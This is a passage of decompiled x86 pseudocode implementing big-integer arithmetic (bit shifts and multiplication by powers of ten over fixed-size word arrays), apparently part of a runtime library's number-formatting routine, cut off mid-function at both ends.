												__eflags = 0;
											} else {
												_t1084 = _t793 + 1;
											}
											_t794 = 0x20;
											_t795 = _t794 - _t1084;
											__eflags = _t795 - 1;
											_t796 = _t795 & 0xffffff00 | _t795 - 0x00000001 > 0x00000000;
											__eflags = _t1064 - 0x73;
											_v1865 = _t796;
											_t1085 = _t1084 & 0xffffff00 | _t1064 - 0x00000073 > 0x00000000;
											__eflags = _t1064 - 0x73;
											if(_t1064 != 0x73) {
												L107:
												_t797 = 0;
												__eflags = 0;
											} else {
												__eflags = _t796;
												if(_t796 == 0) {
													goto L107;
												} else {
													_t797 = 1;
												}
											}
											__eflags = _t1085;
											if(_t1085 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												E0085AABF( &_v468, 0x1cc,  &_v1396, 0);
												_t1279 =  &(_t1279[4]);
											} else {
												__eflags = _t797;
												if(_t797 != 0) {
													goto L126;
												} else {
													_t1112 = 0x72;
													__eflags = _t1064 - _t1112;
													if(_t1064 < _t1112) {
														_t1112 = _t1064;
													}
													__eflags = _t1112 - 0xffffffff;
													if(_t1112 != 0xffffffff) {
														_t1263 = _t1112;
														_t1221 =  &_v468 + _t1112 * 4;
														_v1880 = _t1221;
														while(1) {
															__eflags = _t1263 - _t1064;
															if(_t1263 >= _t1064) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1221;
															}
															_t210 = _t1263 - 1; // 0x70
															__eflags = _t210 - _t1064;
															if(_t210 >= _t1064) {
																_t1173 = 0;
																__eflags = 0;
															} else {
																_t1173 =  *(_t1221 - 4);
															}
															_t1221 = _t1221 - 4;
															_t975 = _v1880;
															_t1263 = _t1263 - 1;
															 *_t975 = _t1173 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t975 - 4;
															__eflags = _t1263 - 0xffffffff;
															if(_t1263 == 0xffffffff) {
																break;
															}
															_t1064 = _v472;
														}
														_t1245 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1112;
													} else {
														_t218 = _t1112 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1197 = 1 - _t1245;
											E0084E920(_t1197,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1276 + 0xbad63d) = 1 << (_t1197 & 0x0000001f);
											_t806 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1113 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1113;
											__eflags = _t1064 - _t1113;
											if(_t1064 == _t1113) {
												_t1177 = 0;
												__eflags = 0;
												while(1) {
													_t977 =  *((intOrPtr*)(_t1276 + _t1177 - 0x570));
													__eflags = _t977 -  *((intOrPtr*)(_t1276 + _t1177 - 0x1d0));
													if(_t977 !=  *((intOrPtr*)(_t1276 + _t1177 - 0x1d0))) {
														goto L101;
													}
													_t1177 = _t1177 + 4;
													__eflags = _t1177 - 8;
													if(_t1177 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1178 = 0;
															__eflags = 0;
														} else {
															_t1178 = _t977 + 1;
														}
														_t978 = 0x20;
														_t1264 = _t1113;
														__eflags = _t978 - _t1178 - _t1113;
														_t980 =  &_v460;
														_v1880 = _t980;
														_t1222 = _t980;
														_t171 =  &_v1865;
														 *_t171 = _t978 - _t1178 - _t1113 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1264 - _t1064;
															if(_t1264 >= _t1064) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1222;
															}
															_t175 = _t1264 - 1; // 0x0
															__eflags = _t175 - _t1064;
															if(_t175 >= _t1064) {
																_t1179 = 0;
																__eflags = 0;
															} else {
																_t1179 =  *(_t1222 - 4);
															}
															_t1222 = _t1222 - 4;
															_t984 = _v1880;
															_t1264 = _t1264 - 1;
															 *_t984 = _t1179 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t984 - 4;
															__eflags = _t1264 - 0xffffffff;
															if(_t1264 == 0xffffffff) {
																break;
															}
															_t1064 = _v472;
														}
														__eflags = _v1865;
														_t1114 = _t1113 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1113;
														_t1224 = _t1114 >> 5;
														_v1884 = _t1114;
														_t1266 = _t1224 << 2;
														E0084E920(_t1224,  &_v1396, 0, _t1266);
														 *(_t1276 + _t1266 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t806 = _t1224 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t806;
										_t1067 = 0x1cc;
										_v936 = _t806;
										__eflags = _t806 << 2;
										E0085AABF( &_v932, 0x1cc,  &_v1396, _t806 << 2);
										_t1282 =  &(_t1279[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1267 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1267;
										__eflags = _t1064 - _t1267;
										if(_t1064 != _t1267) {
											L53:
											_t995 = _v1872 + 1;
											_t996 = _t995 & 0x0000001f;
											_t1117 = 0x20;
											_v1876 = _t996;
											_t1226 = _t995 >> 5;
											_v1872 = _t1226;
											_v1908 = _t1117 - _t996;
											_t999 = E0084DDE0(1, _t1117 - _t996, 0);
											_t1119 =  *((intOrPtr*)(_t1276 + _t1064 * 4 - 0x1d4));
											_t1000 = _t999 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t1000;
											_v1912 =  !_t1000;
											if( *_t108 == 0) {
												_t1120 = 0;
												__eflags = 0;
											} else {
												_t1120 = _t1119 + 1;
											}
											_t1002 = 0x20;
											_t1003 = _t1002 - _t1120;
											_t1184 = _t1064 + _t1226;
											__eflags = _v1876 - _t1003;
											_v1892 = _t1184;
											_t1004 = _t1003 & 0xffffff00 | _v1876 - _t1003 > 0x00000000;
											__eflags = _t1184 - 0x73;
											_v1865 = _t1004;
											_t1121 = _t1120 & 0xffffff00 | _t1184 - 0x00000073 > 0x00000000;
											__eflags = _t1184 - 0x73;
											if(_t1184 != 0x73) {
												L59:
												_t1005 = 0;
												__eflags = 0;
											} else {
												__eflags = _t1004;
												if(_t1004 == 0) {
													goto L59;
												} else {
													_t1005 = 1;
												}
											}
											__eflags = _t1121;
											if(_t1121 != 0) {
												L81:
												__eflags = 0;
												_t1067 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E0085AABF( &_v468, 0x1cc,  &_v1396, 0);
												_t1279 =  &(_t1279[4]);
											} else {
												__eflags = _t1005;
												if(_t1005 != 0) {
													goto L81;
												} else {
													_t1122 = 0x72;
													__eflags = _t1184 - _t1122;
													if(_t1184 >= _t1122) {
														_t1184 = _t1122;
														_v1892 = _t1122;
													}
													_t1015 = _t1184;
													_v1880 = _t1015;
													__eflags = _t1184 - 0xffffffff;
													if(_t1184 != 0xffffffff) {
														_t1185 = _v1872;
														_t1269 = _t1184 - _t1185;
														__eflags = _t1269;
														_t1126 =  &_v468 + _t1269 * 4;
														_v1888 = _t1126;
														while(1) {
															__eflags = _t1015 - _t1185;
															if(_t1015 < _t1185) {
																break;
															}
															__eflags = _t1269 - _t1064;
															if(_t1269 >= _t1064) {
																_t1229 = 0;
																__eflags = 0;
															} else {
																_t1229 =  *_t1126;
															}
															__eflags = _t1269 - 1 - _t1064;
															if(_t1269 - 1 >= _t1064) {
																_t1020 = 0;
																__eflags = 0;
															} else {
																_t1020 =  *(_t1126 - 4);
															}
															_t1023 = _v1880;
															_t1126 = _v1888 - 4;
															_v1888 = _t1126;
															 *(_t1276 + _t1023 * 4 - 0x1d0) = (_t1229 & _v1884) << _v1876 | (_t1020 & _v1912) >> _v1908;
															_t1015 = _t1023 - 1;
															_t1269 = _t1269 - 1;
															_v1880 = _t1015;
															__eflags = _t1015 - 0xffffffff;
															if(_t1015 != 0xffffffff) {
																_t1064 = _v472;
																continue;
															}
															break;
														}
														_t1184 = _v1892;
														_t1226 = _v1872;
														_t1267 = 2;
													}
													__eflags = _t1226;
													if(_t1226 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1226 << 2);
														_t1279 =  &(_t1279[3]);
													}
													__eflags = _v1865;
													_t1067 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1184;
													} else {
														_v472 = _t1184 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1267;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1130 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1276 + _t1130 - 0x570)) -  *((intOrPtr*)(_t1276 + _t1130 - 0x1d0));
												if( *((intOrPtr*)(_t1276 + _t1130 - 0x570)) !=  *((intOrPtr*)(_t1276 + _t1130 - 0x1d0))) {
													goto L53;
												}
												_t1130 = _t1130 + 4;
												__eflags = _t1130 - 8;
												if(_t1130 != 8) {
													continue;
												} else {
													_t1026 = _v1872 + 2;
													_t1027 = _t1026 & 0x0000001f;
													_t1131 = 0x20;
													_t1132 = _t1131 - _t1027;
													_v1888 = _t1027;
													_t1271 = _t1026 >> 5;
													_v1876 = _t1271;
													_v1908 = _t1132;
													_t1030 = E0084DDE0(1, _t1132, 0);
													_v1896 = _v1896 & 0x00000000;
													_t1031 = _t1030 - 1;
													__eflags = _t1031;
													asm("bsr ecx, edi");
													_v1884 = _t1031;
													_v1912 =  !_t1031;
													if(_t1031 == 0) {
														_t1133 = 0;
														__eflags = 0;
													} else {
														_t1133 = _t1132 + 1;
													}
													_t1033 = 0x20;
													_t1034 = _t1033 - _t1133;
													_t1187 = _t1271 + 2;
													__eflags = _v1888 - _t1034;
													_v1880 = _t1187;
													_t1035 = _t1034 & 0xffffff00 | _v1888 - _t1034 > 0x00000000;
													__eflags = _t1187 - 0x73;
													_v1865 = _t1035;
													_t1134 = _t1133 & 0xffffff00 | _t1187 - 0x00000073 > 0x00000000;
													__eflags = _t1187 - 0x73;
													if(_t1187 != 0x73) {
														L28:
														_t1036 = 0;
														__eflags = 0;
													} else {
														__eflags = _t1035;
														if(_t1035 == 0) {
															goto L28;
														} else {
															_t1036 = 1;
														}
													}
													__eflags = _t1134;
													if(_t1134 != 0) {
														L50:
														__eflags = 0;
														_t1067 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E0085AABF( &_v468, 0x1cc,  &_v1396, 0);
														_t1279 =  &(_t1279[4]);
													} else {
														__eflags = _t1036;
														if(_t1036 != 0) {
															goto L50;
														} else {
															_t1137 = 0x72;
															__eflags = _t1187 - _t1137;
															if(_t1187 >= _t1137) {
																_t1187 = _t1137;
																_v1880 = _t1137;
															}
															_t1138 = _t1187;
															_v1892 = _t1138;
															__eflags = _t1187 - 0xffffffff;
															if(_t1187 != 0xffffffff) {
																_t1188 = _v1876;
																_t1273 = _t1187 - _t1188;
																__eflags = _t1273;
																_t1046 =  &_v468 + _t1273 * 4;
																_v1872 = _t1046;
																while(1) {
																	__eflags = _t1138 - _t1188;
																	if(_t1138 < _t1188) {
																		break;
																	}
																	__eflags = _t1273 - _t1064;
																	if(_t1273 >= _t1064) {
																		_t1235 = 0;
																		__eflags = 0;
																	} else {
																		_t1235 =  *_t1046;
																	}
																	__eflags = _t1273 - 1 - _t1064;
																	if(_t1273 - 1 >= _t1064) {
																		_t1048 = 0;
																		__eflags = 0;
																	} else {
																		_t1048 =  *(_v1872 - 4);
																	}
																	_t1143 = _v1892;
																	 *(_t1276 + _t1143 * 4 - 0x1d0) = (_t1048 & _v1912) >> _v1908 | (_t1235 & _v1884) << _v1888;
																	_t1138 = _t1143 - 1;
																	_t1273 = _t1273 - 1;
																	_t1046 = _v1872 - 4;
																	_v1892 = _t1138;
																	_v1872 = _t1046;
																	__eflags = _t1138 - 0xffffffff;
																	if(_t1138 != 0xffffffff) {
																		_t1064 = _v472;
																		continue;
																	}
																	break;
																}
																_t1187 = _v1880;
																_t1271 = _v1876;
															}
															__eflags = _t1271;
															if(_t1271 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1271 << 2);
																_t1279 =  &(_t1279[3]);
															}
															__eflags = _v1865;
															_t1067 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1187;
															} else {
																_v472 = _t1187 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1041 = 4;
													__eflags = 1;
													_v1396 = _t1041;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1041);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1067);
										_push( &_v932);
										E0085AABF();
										_t1282 =  &(_t1279[4]);
									}
									_t811 = _v1904;
									_t1087 = 0xa;
									_v1912 = _t1087;
									__eflags = _t811;
									if(_t811 < 0) {
										_t812 =  ~_t811;
										_t813 = _t812 / _t1087;
										_v1880 = _t813;
										_t1088 = _t812 % _t1087;
										_v1884 = _t1088;
										__eflags = _t813;
										if(_t813 == 0) {
											L249:
											__eflags = _t1088;
											if(_t1088 != 0) {
												_t852 =  *(0x866a9c + _t1088 * 4);
												_v1896 = _t852;
												__eflags = _t852;
												if(_t852 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t852 - 1;
													if(_t852 != 1) {
														_t1099 = _v472;
														__eflags = _t1099;
														if(_t1099 != 0) {
															_t1204 = 0;
															_t1253 = 0;
															__eflags = 0;
															do {
																_t1158 = _t852 *  *(_t1276 + _t1253 * 4 - 0x1d0) >> 0x20;
																 *(_t1276 + _t1253 * 4 - 0x1d0) = _t852 *  *(_t1276 + _t1253 * 4 - 0x1d0) + _t1204;
																_t852 = _v1896;
																asm("adc edx, 0x0");
																_t1253 = _t1253 + 1;
																_t1204 = _t1158;
																__eflags = _t1253 - _t1099;
															} while (_t1253 != _t1099);
															__eflags = _t1204;
															if(_t1204 != 0) {
																_t859 = _v472;
																__eflags = _t859 - 0x73;
																if(_t859 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1276 + _t859 * 4 - 0x1d0) = _t1204;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t813 - 0x26;
												if(_t813 > 0x26) {
													_t813 = 0x26;
												}
												_t1100 =  *(0x866a06 + _t813 * 4) & 0x000000ff;
												_v1872 = _t813;
												_v1400 = ( *(0x866a06 + _t813 * 4) & 0x000000ff) + ( *(0x866a07 + _t813 * 4) & 0x000000ff);
												E0084E920(_t1100 << 2,  &_v1396, 0, _t1100 << 2);
												_t870 = E0084EA80( &(( &_v1396)[_t1100]), 0x866100 + ( *(0x866a04 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x866a07 + _t813 * 4) & 0x000000ff) << 2);
												_t1101 = _v1400;
												_t1282 =  &(_t1282[6]);
												_v1892 = _t1101;
												__eflags = _t1101 - 1;
												if(_t1101 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1101 - _v472;
														_t1207 =  &_v1396;
														_t871 = _t870 & 0xffffff00 | _t1101 - _v472 > 0x00000000;
														__eflags = _t871;
														if(_t871 != 0) {
															_t1159 =  &_v468;
														} else {
															_t1207 =  &_v468;
															_t1159 =  &_v1396;
														}
														_v1908 = _t1159;
														__eflags = _t871;
														if(_t871 == 0) {
															_t1101 = _v472;
														}
														_v1876 = _t1101;
														__eflags = _t871;
														if(_t871 != 0) {
															_v1892 = _v472;
														}
														_t1160 = 0;
														_t1255 = 0;
														_v1864 = 0;
														__eflags = _t1101;
														if(_t1101 == 0) {
															L243:
															_v472 = _t1160;
															_t873 = _t1160 << 2;
															__eflags = _t873;
															_push(_t873);
															_t874 =  &_v1860;
															goto L244;
														} else {
															_t1208 = _t1207 -  &_v1860;
															__eflags = _t1208;
															_v1928 = _t1208;
															do {
																_t881 =  *(_t1276 + _t1208 + _t1255 * 4 - 0x740);
																_v1896 = _t881;
																__eflags = _t881;
																if(_t881 != 0) {
																	_t882 = 0;
																	_t1209 = 0;
																	_t1102 = _t1255;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1102 - 0x73;
																		if(_t1102 == 0x73) {
																			goto L258;
																		} else {
																			_t1208 = _v1928;
																			_t1101 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1102 - 0x73;
																			if(_t1102 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1102 - _t1160;
																			if(_t1102 == _t1160) {
																				 *(_t1276 + _t1102 * 4 - 0x740) =  *(_t1276 + _t1102 * 4 - 0x740) & 0x00000000;
																				_t894 = _t882 + 1 + _t1255;
																				__eflags = _t894;
																				_v1864 = _t894;
																				_t882 = _v1888;
																			}
																			_t889 =  *(_v1908 + _t882 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1276 + _t1102 * 4 - 0x740) =  *(_t1276 + _t1102 * 4 - 0x740) + _t889 * _v1896 + _t1209;
																			asm("adc edx, 0x0");
																			_t882 = _v1888 + 1;
																			_t1102 = _t1102 + 1;
																			_v1888 = _t882;
																			_t1209 = _t889 * _v1896 >> 0x20;
																			_t1160 = _v1864;
																			__eflags = _t882 - _v1892;
																			if(_t882 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1209;
																				if(_t1209 == 0) {
																					goto L240;
																				}
																				__eflags = _t1102 - 0x73;
																				if(_t1102 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1102 - _t1160;
																					if(_t1102 == _t1160) {
																						_t558 = _t1276 + _t1102 * 4 - 0x740;
																						 *_t558 =  *(_t1276 + _t1102 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1102 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t887 = _t1209;
																					_t1209 = 0;
																					 *(_t1276 + _t1102 * 4 - 0x740) =  *(_t1276 + _t1102 * 4 - 0x740) + _t887;
																					_t1160 = _v1864;
																					asm("adc edi, edi");
																					_t1102 = _t1102 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1255 - _t1160;
																	if(_t1255 == _t1160) {
																		 *(_t1276 + _t1255 * 4 - 0x740) =  *(_t1276 + _t1255 * 4 - 0x740) & _t881;
																		_t526 = _t1255 + 1; // 0x1
																		_t1160 = _t526;
																		_v1864 = _t1160;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1255 = _t1255 + 1;
																__eflags = _t1255 - _t1101;
															} while (_t1255 != _t1101);
															goto L243;
														}
													} else {
														_t1210 = _v468;
														_v472 = _t1101;
														E0085AABF( &_v468, _t1067,  &_v1396, _t1101 << 2);
														_t1282 =  &(_t1282[4]);
														__eflags = _t1210;
														if(_t1210 == 0) {
															goto L203;
														} else {
															__eflags = _t1210 - 1;
															if(_t1210 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1103 = 0;
																	_v1896 = _v472;
																	_t1256 = 0;
																	__eflags = 0;
																	do {
																		_t903 = _t1210;
																		_t1161 = _t903 *  *(_t1276 + _t1256 * 4 - 0x1d0) >> 0x20;
																		 *(_t1276 + _t1256 * 4 - 0x1d0) = _t903 *  *(_t1276 + _t1256 * 4 - 0x1d0) + _t1103;
																		asm("adc edx, 0x0");
																		_t1256 = _t1256 + 1;
																		_t1103 = _t1161;
																		__eflags = _t1256 - _v1896;
																	} while (_t1256 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1211 = _v1396;
													__eflags = _t1211;
													if(_t1211 != 0) {
														__eflags = _t1211 - 1;
														if(_t1211 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1104 = 0;
																_v1896 = _v472;
																_t1257 = 0;
																__eflags = 0;
																do {
																	_t908 = _t1211;
																	_t1162 = _t908 *  *(_t1276 + _t1257 * 4 - 0x1d0) >> 0x20;
																	 *(_t1276 + _t1257 * 4 - 0x1d0) = _t908 *  *(_t1276 + _t1257 * 4 - 0x1d0) + _t1104;
																	asm("adc edx, 0x0");
																	_t1257 = _t1257 + 1;
																	_t1104 = _t1162;
																	__eflags = _t1257 - _v1896;
																} while (_t1257 != _v1896);
																L208:
																__eflags = _t1103;
																if(_t1103 == 0) {
																	goto L245;
																} else {
																	_t906 = _v472;
																	__eflags = _t906 - 0x73;
																	if(_t906 >= 0x73) {
																		L258:
																		_v2408 = 0;
																		_v472 = 0;
																		E0085AABF( &_v468, _t1067,  &_v2404, 0);
																		_t1282 =  &(_t1282[4]);
																		_t877 = 0;
																	} else {
																		 *(_t1276 + _t906 * 4 - 0x1d0) = _t1103;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t874 =  &_v2404;
														L244:
														_push(_t874);
														_push(_t1067);
														_push( &_v468);
														E0085AABF();
														_t1282 =  &(_t1282[4]);
														L245:
														_t877 = 1;
													}
												}
												L246:
												__eflags = _t877;
												if(_t877 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t855 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t813 = _v1880 - _v1872;
												__eflags = _t813;
												_v1880 = _t813;
											} while (_t813 != 0);
											_t1088 = _v1884;
											goto L249;
										}
									} else {
										_t911 = _t811 / _t1087;
										_v1908 = _t911;
										_t1105 = _t811 % _t1087;
										_v1896 = _t1105;
										__eflags = _t911;
										if(_t911 == 0) {
											L184:
											__eflags = _t1105;
											if(_t1105 != 0) {
												_t1212 =  *(0x866a9c + _t1105 * 4);
												__eflags = _t1212;
												if(_t1212 != 0) {
													__eflags = _t1212 - 1;
													if(_t1212 != 1) {
														_t912 = _v936;
														_v1896 = _t912;
														__eflags = _t912;
														if(_t912 != 0) {
															_t1258 = 0;
															_t1106 = 0;
															__eflags = 0;
															do {
																_t913 = _t1212;
																_t1166 = _t913 *  *(_t1276 + _t1106 * 4 - 0x3a0) >> 0x20;
																 *(_t1276 + _t1106 * 4 - 0x3a0) = _t913 *  *(_t1276 + _t1106 * 4 - 0x3a0) + _t1258;
																asm("adc edx, 0x0");
																_t1106 = _t1106 + 1;
																_t1258 = _t1166;
																__eflags = _t1106 - _v1896;
															} while (_t1106 != _v1896);
															__eflags = _t1258;
															if(_t1258 != 0) {
																_t916 = _v936;
																__eflags = _t916 - 0x73;
																if(_t916 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1276 + _t916 * 4 - 0x3a0) = _t1258;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t911 - 0x26;
												if(_t911 > 0x26) {
													_t911 = 0x26;
												}
												_t1107 =  *(0x866a06 + _t911 * 4) & 0x000000ff;
												_v1888 = _t911;
												_v1400 = ( *(0x866a06 + _t911 * 4) & 0x000000ff) + ( *(0x866a07 + _t911 * 4) & 0x000000ff);
												E0084E920(_t1107 << 2,  &_v1396, 0, _t1107 << 2);
												_t929 = E0084EA80( &(( &_v1396)[_t1107]), 0x866100 + ( *(0x866a04 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x866a07 + _t911 * 4) & 0x000000ff) << 2);
												_t1108 = _v1400;
												_t1282 =  &(_t1282[6]);
												_v1892 = _t1108;
												__eflags = _t1108 - 1;
												if(_t1108 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1108 - _v936;
														_t1215 =  &_v1396;
														_t930 = _t929 & 0xffffff00 | _t1108 - _v936 > 0x00000000;
														__eflags = _t930;
														if(_t930 != 0) {
															_t1167 =  &_v932;
														} else {
															_t1215 =  &_v932;
															_t1167 =  &_v1396;
														}
														_v1876 = _t1167;
														__eflags = _t930;
														if(_t930 == 0) {
															_t1108 = _v936;
														}
														_v1880 = _t1108;
														__eflags = _t930;
														if(_t930 != 0) {
															_v1892 = _v936;
														}
														_t1168 = 0;
														_t1260 = 0;
														_v1864 = 0;
														__eflags = _t1108;
														if(_t1108 == 0) {
															L177:
															_v936 = _t1168;
															_t932 = _t1168 << 2;
															__eflags = _t932;
															goto L178;
														} else {
															_t1216 = _t1215 -  &_v1860;
															__eflags = _t1216;
															_v1928 = _t1216;
															do {
																_t940 =  *(_t1276 + _t1216 + _t1260 * 4 - 0x740);
																_v1884 = _t940;
																__eflags = _t940;
																if(_t940 != 0) {
																	_t941 = 0;
																	_t1217 = 0;
																	_t1109 = _t1260;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1109 - 0x73;
																		if(_t1109 == 0x73) {
																			goto L187;
																		} else {
																			_t1216 = _v1928;
																			_t1108 = _v1880;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1109 - 0x73;
																			if(_t1109 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1109 - _t1168;
																			if(_t1109 == _t1168) {
																				 *(_t1276 + _t1109 * 4 - 0x740) =  *(_t1276 + _t1109 * 4 - 0x740) & 0x00000000;
																				_t953 = _t941 + 1 + _t1260;
																				__eflags = _t953;
																				_v1864 = _t953;
																				_t941 = _v1872;
																			}
																			_t948 =  *(_v1876 + _t941 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1276 + _t1109 * 4 - 0x740) =  *(_t1276 + _t1109 * 4 - 0x740) + _t948 * _v1884 + _t1217;
																			asm("adc edx, 0x0");
																			_t941 = _v1872 + 1;
																			_t1109 = _t1109 + 1;
																			_v1872 = _t941;
																			_t1217 = _t948 * _v1884 >> 0x20;
																			_t1168 = _v1864;
																			__eflags = _t941 - _v1892;
																			if(_t941 != _v1892) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				__eflags = _t1217;
																				if(_t1217 == 0) {
																					goto L174;
																				}
																				__eflags = _t1109 - 0x73;
																				if(_t1109 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t943 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1109 - _t1168;
																					if(_t1109 == _t1168) {
																						_t370 = _t1276 + _t1109 * 4 - 0x740;
																						 *_t370 =  *(_t1276 + _t1109 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t370;
																						_t376 = _t1109 + 1; // 0x1
																						_v1864 = _t376;
																					}
																					_t946 = _t1217;
																					_t1217 = 0;
																					 *(_t1276 + _t1109 * 4 - 0x740) =  *(_t1276 + _t1109 * 4 - 0x740) + _t946;
																					_t1168 = _v1864;
																					asm("adc edi, edi");
																					_t1109 = _t1109 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1260 - _t1168;
																	if(_t1260 == _t1168) {
																		 *(_t1276 + _t1260 * 4 - 0x740) =  *(_t1276 + _t1260 * 4 - 0x740) & _t940;
																		_t338 = _t1260 + 1; // 0x1
																		_t1168 = _t338;
																		_v1864 = _t1168;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1260 = _t1260 + 1;
																__eflags = _t1260 - _t1108;
															} while (_t1260 != _t1108);
															goto L177;
														}
													} else {
														_t1218 = _v932;
														_v936 = _t1108;
														E0085AABF( &_v932, _t1067,  &_v1396, _t1108 << 2);
														_t1282 =  &(_t1282[4]);
														__eflags = _t1218;
														if(_t1218 != 0) {
															__eflags = _t1218 - 1;
															if(_t1218 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1110 = 0;
																	_v1884 = _v936;
																	_t1261 = 0;
																	__eflags = 0;
																	do {
																		_t961 = _t1218;
																		_t1169 = _t961 *  *(_t1276 + _t1261 * 4 - 0x3a0) >> 0x20;
																		 *(_t1276 + _t1261 * 4 - 0x3a0) = _t961 *  *(_t1276 + _t1261 * 4 - 0x3a0) + _t1110;
																		asm("adc edx, 0x0");
																		_t1261 = _t1261 + 1;
																		_t1110 = _t1169;
																		__eflags = _t1261 - _v1884;
																	} while (_t1261 != _v1884);
																	goto L149;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t933 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1219 = _v1396;
													__eflags = _t1219;
													if(_t1219 != 0) {
														__eflags = _t1219 - 1;
														if(_t1219 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1111 = 0;
																_v1884 = _v936;
																_t1262 = 0;
																__eflags = 0;
																do {
																	_t968 = _t1219;
																	_t1170 = _t968 *  *(_t1276 + _t1262 * 4 - 0x3a0) >> 0x20;
																	 *(_t1276 + _t1262 * 4 - 0x3a0) = _t968 *  *(_t1276 + _t1262 * 4 - 0x3a0) + _t1111;
																	asm("adc edx, 0x0");
																	_t1262 = _t1262 + 1;
																	_t1111 = _t1170;
																	__eflags = _t1262 - _v1884;
																} while (_t1262 != _v1884);
																L149:
																__eflags = _t1110;
																if(_t1110 == 0) {
																	goto L180;
																} else {
																	_t964 = _v936;
																	__eflags = _t964 - 0x73;
																	if(_t964 < 0x73) {
